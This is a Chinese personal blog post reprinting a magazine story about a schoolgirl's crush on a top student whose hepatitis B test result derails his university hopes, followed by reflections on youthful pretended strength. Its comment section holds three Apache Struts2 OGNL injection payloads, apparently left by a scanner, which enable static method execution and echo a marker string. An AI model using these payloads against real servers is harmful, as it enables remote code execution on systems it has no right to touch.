一颗帅星星 – 马果然's Blog

青春没有自以为是的坚强



我们走在让人羡慕的青春年代

在心灵不断成长的过程中

也的确学会了在繁杂的生活中表现得更加坚强

但是,我们真的学会了坚强吗

那些你认定是坚强的东西会在真正审视内心的那一瞬间瓦解奔溃

年轻总是希望别人看到自己刀枪不入的一面

但实际上青春没有自以为是的坚强

接下来要讲的故事

可能就是你的经历

也可能发生在你的身边

这些类似的过往似乎很平淡

但一定会在我们的心里扎根

一辈子都不会忘

很早就见过他,平头,白衬衫,一双炯炯有神的眼睛。从我们高二楼前经过时,怀里总抱著厚厚的书。只知道他学习刻苦,但那天才知道,他是高三的尖子生。

那个暖洋洋的午后,班主任带著几个高三学生来给我们讲学习方法。五六十双眼睛齐刷刷看著台上轮流上阵的优秀生,无不流露出钦佩羡慕之情。

他是最后一个上台的,和前几位不同,没有大谈经验方法,而是直接拿起一根粉笔,在黑板洋洋洒洒写下一道数学题。这道看似普通的难题,他却用了不下5种方法来讲解。当3米长、1米高的空间写满共识富豪,他终于笑了,这就是他给我们讲的学习方法,贵在开拓思路。
只是他没想到,他同时也在开启了一个女孩蠢蠢欲动、粉色荡漾的心。
在那堂课结束后,我打听到关于他的很多信息,他叫沈格,年级前五名,热爱运动,获得过省数学竞赛一等奖。更令人我惊喜的是,他的教室在我们楼上,每次放学,都会从这里经过。从此,我藉故调换了靠窗的座位,窗玻璃上贴著花纸,切开一个小口,就可以看到他匆匆走过的身影。

以往晚自习,总是一打铃我就回宿舍,后来观察到,自习结束后他还要待一会儿,我便一边看书,一边瞥一眼窗外,等他出来才收拾书本。

那天晚上,只顾低头做题的我忘了看窗外,当难题终被解出,再抬头,熄灯铃都响了。我懊恼地收拾书本,刚走出教室,四周便漆黑一片,想起小说里的恐怖情节,心如鹿跳。这时,前方啪一声蹿出一丝光,接着这亮光,我竟看到沈格,举着打火机站在那里。他嘴角摆着一抹笑,望着我说,你不必每晚等我,我来叫你。

我红着脸恨不得找个地缝转进去,17岁的秘密就这样,在他的聪慧机敏下,不告而破。
果然从那以后,每晚,他都会轻叩两下玻璃,然后,靠在栏杆边等我。我的秘密变成了我们的秘密,心照不宣,守口如瓶。版刻平淡的高中生活,因为那两声轻叩,绚丽多姿起来。

晚上结伴而行的路上,我将抄有难题的纸条递给他,第二晚,他把写好解答的纸条再还我。有时,旁边画一只可爱的皮卡丘。他安静的外表下,其实有颗顽皮的心。

我向他借高二的物理笔记,他蹙眉由于一会儿,又点点头。三天后的课间,窗台上放了本笔记本,隔着玻璃,深绿色的封皮平滑光滑。我快速抛出教室,打开笔记本,映入眼帘的干净清爽告诉我它的崭新。我问他,他才说,以前那本弄丢了,重写了一本。高三时间,寸阴寸金,一本笔记也许就是三套模拟题。可他,轻描淡写,便草草带过。

老师们希望沈格左拥清华,右抱北大,为学校争光,载入史册。但老师们的鼓励并未奏效,他的目标庄重而务实。那所学校虽然没有清华名气大,也没有北大历史就,但它的专业确实沈格心仪已久。

为此,我也暗下决心,将来报考这所重点大学。然后,于沈格牵手走在栽满的校园里。

体检完后,离高考就只剩八十多天了。学校里的空气都似凝固,到处充满紧张压抑的气氛。沈格反而放松下来,他不再每晚加班学习,一打放学铃便走出教室。

我想大概他胸有成竹,箭已在弦,只等一发。可是一晚。自习还没结束,他竟提前走出教室,经过窗口时,他没有停步。我顾不得周围人的惊异,跑出教室,在楼梯拐弯处将他拦住。

月光清澈,我们的影子常常地托在脚下,我一番不要松懈,要加油之类的老生常谈,他听了只是笑,轻蔑地笑。他说我怎么可能考不上,倒是你,明年能不能考上大学还是问题。

他转身走了,留下我,愣在原地好长时间。第一次,我清醒地看到我们之间的距离,一个优秀生与一个中等生之间的距离,仿佛这蜿蜒的楼梯,跨了多少级台阶,才能再上一层楼。我心如死灰,脆又丧气地占了好久,知道放学的人群将我淹没。

第二日,我用彩色胶卷赌注玻璃花纸的切口,并在文具盒里写下那所大学的名字。从此激励,我要考上,必须,一定。我将挺起胸膛走出它的大门,让沈格无地自容,羞愧难当。

我主动断绝了与沈格的,他也不再敲窗等我。偶尔在路上碰到,擦肩而过时,我们竟形同陌路。

那天黄昏在操场,我又看到他,踢球时脚受了伤,低垂着头坐在地上。许久未见,他显得颓废邋遢,头发凌乱地盖住眼睛,也许是过于疼痛,他开始失声大哭。

我远远地望着,他的软弱,让我感到差异心痛。我一时间感到茫然,不知到底该相信那个在讲台上自信飞扬的他,还是相信眼前这个不堪一击的男孩。

我更不知这样的他如何去面对高考,以及未来道路上四伏的挫折。

那年的高考我记忆犹新,雨下了两天两夜,我等了两天两夜。当考完最后一门,我心里一时冲动,打着伞奔向学校。隔着雨帘,我看到满脸疲惫的沈格。那是我们最后一次碰面,他淡漠地瞥了我一眼,将书本顶在头上,快步离开了。再没有只言片语,一切就一结束。

新学期时,高考结束被张贴在校公告栏,所有考入大学的名单都在这里公布。我找到沈格,他的名字卑微地夹在中间,只是,考上的学校既不是他所期盼的,也不是什么清华北大,而是一所很普通的大学。

我应该放生唱,应该高兴。我不费一枪一弹,就狠狠地回击了他。他的自信成就了他,也是他的自信,摧毁了他。

可那一刻,我怎么都笑不出来,木然地站在橱窗前,整个人仿佛在烈日下融化开,粘稠无力。期待的结局似乎并不是这样。

紧张的高三开始了。我坐在沈格做过的教室,重复他经过的生活。我还是喜欢坐在窗口,看外面天空中,鸟儿飞向。原来再登一层楼,事业会如此开阔。

只是时常,晚自习结束,从题海中抬头,还是会想起沈格,怨恨随着时间正抽丝剥茧。报考那所大学,更多地成了一种对自我的鞭策。

我年,我瘦了十几斤,换来的正式那所美丽校园的录取通知书。

新学期时,高考结束被张贴在校公告栏,所有考入大学的名单都在这里公布。我找到沈格,他的名字卑微地夹在中间,只是,考上的学校并不出色。

大一暑假,为了迎接我的归来,父母在家里摆了一打桌菜,从刚下班的大姑妈也赶了过来。

聊到新鲜环境,我滔滔不绝。姑妈问起我学校夥食如何,还反复提醒我注意传染病。有其像乙肝之类的,最好预防。

姑妈到底是,警惕性太强。我笑姑妈杞人忧天,哪有那么多乙肝携带者。看我一脸轻松,姑妈叹口气说,你们上一届还是上上街,有个男孩,体检就查处是乙型肝炎表面抗原携带者。

我心里隐隐有种预感,我忙拉住姑妈的胳膊,那个男孩叫什么,叫什么。好像叫,叫……沈什么的,听说学习特别棒,可惜了呀,有的专业根本不收这类学生。

耳边似有一声闷雷惊炸,接下来的饭菜,我食之无味。被摊在桌面时,往事一下子那么沉那么沉。

那年体检过后,沈格泄气松懈,当梦想落空,生命失去弹力,他没有了力量再次腾跃。国王的疑惑在头脑中渐次过滤,难怪他曾疏远我,用言辞刺我,在他错段梦想的翅膀后,更不愿我丧失飞向的动力,

薄薄一纸化验单,让一个男孩坚毅的心志崩溃夭折。可最让人心痛的,那时的我没有在他身旁,哪怕一句安慰鼓励也没有。

后来,我辗转问了好多人,终于打听到他的。

依旧是夜晚,拨通他的宿舍,一个男的调侃地说,沈格和女朋友浪漫去了。说完笑起来,还问我要不要留话。举着的手微微颤抖,我说谢谢,不用了。

当挂断,我再也不住,任眼泪肆意流淌。就在放下那一课,我想起那年的黄昏,夕阳渐沉,沈格坐在地上失声痛哭的表情。那么悲愤,那么失落。当隐的痛勉强找到一个借口时,终于轰然发泄。

每个人都以为他胆小,此刻我才懂,他哭泣背后的真正原因。

其实,那年他被医务室后,我曾在门外徘徊了好久,但还是逃开了。我只是确实了那么一点点勇气,紧守了那一点点自尊,为此,年少时最美好的一段时光,因为我的仓皇而逃,在也找不回来了。

我们都以为自己足够坚强,却原来这么的软弱。

故事就讲到这里

在每个人的成长过程中

对于坚强的理解会不断变化

好多时候妈妈告诉你

摔倒了站起来不要哭

这就是坚强

长大一些

一个人过夜

或许也会被称之为坚强

考砸了镇定自若地准备接下来的学习

失恋了一滴眼泪也没有流

朋友们也会赞叹我们的坚强

但是我们终会发现

之前被我们认为的坚强

只不过是演戏而已

演给别人看

也演给自己看

当我们微笑着说我很坚强的时候

其实内心在默默的流泪

这些坚强也在未来的某个时刻瞬间瓦解

当我们凝望过去的时候

发觉的自己多么的可笑

也悲叹着我们从未失去的美好

青春没有自以为是的坚强

总有些想说的话却不想跟别人说

因为只有某的特定的人最了解自己

但是当青春和坚强成为了自我否认的挡箭牌

不断回避自己内心的真实想法

那个人终将消失在茫茫人海中

跟你的青春一样 随风飘散。

 

文中故事《青春没有自以为是的坚强》/浅步调

摘自青年文摘绿版2007年11期·青春风铃

©原创文章,版权所有,转载请注明出处。

WWW.MAGUORAN.COM

 

56 Replies to “青春没有自以为是的坚强”

  1. ‘+(#context[\”xwork.MethodAccessor.denyMethodExecution\”]=new java.lang.Boolean(false),#_memberAccess[\”allowStaticMethodAccess\”]=new java.lang.Boolean(true),#_memberAccess.excludeProperties={},#a_str=’814F60BD-F6DF-4227-‘,#b_str=’86F5-8D9FBF26A2EB’,#a_resp=@org.apache.struts2.ServletActionContext@getResponse(),#a_resp.getWriter().println(#a_str+#b_str),#a_resp.getWriter().flush(),#a_resp.getWriter().close())+’

  2. %{#context[‘xwork.MethodAccessor.denyMethodExecution’]=false,#_memberAccess.allowStaticMethodAccess=true,#_memberAccess.excludeProperties={},#a_str=’814F60BD-F6DF-4227-‘,#b_str=’86F5-8D9FBF26A2EB’,#a_resp=@org.apache.struts2.ServletActionContext@getResponse(),#a_resp.getWriter().println(#a_str+#b_str),#a_resp.getWriter().flush(),#a_resp.getWriter().close()}

  3. ‘+(#context[‘xwork.MethodAccessor.denyMethodExecution’]=false,#_memberAccess.allowStaticMethodAccess=true,#_memberAccess.excludeProperties={},#a_str=’814F60BD-F6DF-4227-‘,#b_str=’86F5-8D9FBF26A2EB’,#a_resp=@org.apache.struts2.ServletActionContext@getResponse(),#a_resp.getWriter().println(#a_str+#b_str),#a_resp.getWriter().flush(),#a_resp.getWriter().close())+’

发表评论

电子邮件地址不会被公开。